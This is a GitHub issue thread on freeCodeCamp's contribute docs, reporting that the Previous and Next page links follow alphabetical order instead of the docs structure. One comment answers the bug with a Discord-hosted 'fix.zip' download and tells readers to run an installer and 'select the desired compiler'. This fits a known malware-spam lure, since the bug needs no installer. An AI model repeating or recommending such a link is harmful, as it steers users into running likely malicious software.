### ISSUE TITLE
Alphabetical `Previous` and `Next` links at the bottom of each page

### ISSUE THREAD

**Issue by gikf** [freeCodeCamp/contribute#304]
**Describe the bug**
`Previous` and `Next` links at the bottom of each page are linking to the alphabetical next/previous page, 

**To Reproduce**
1. Go to any page. For example `/intro`.
2. Scroll down to see the `Previous` and `Next` links.
3. See links to the alphabetically _previous_ and _next_ pages.
![image](https://github.com/user-attachments/assets/d04b8113-8274-4201-87d2-d317ef6a932f)

**Expected behavior**
They should link to the `Previous` or `Next` page, based on docs structure, not alphabetically.

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by a2937** [comment]
Edit: Individually updating them is a terrible idea. Though I have to wonder how to fix it. I'm fairly sure that my rewriting of the sidebar broke it.
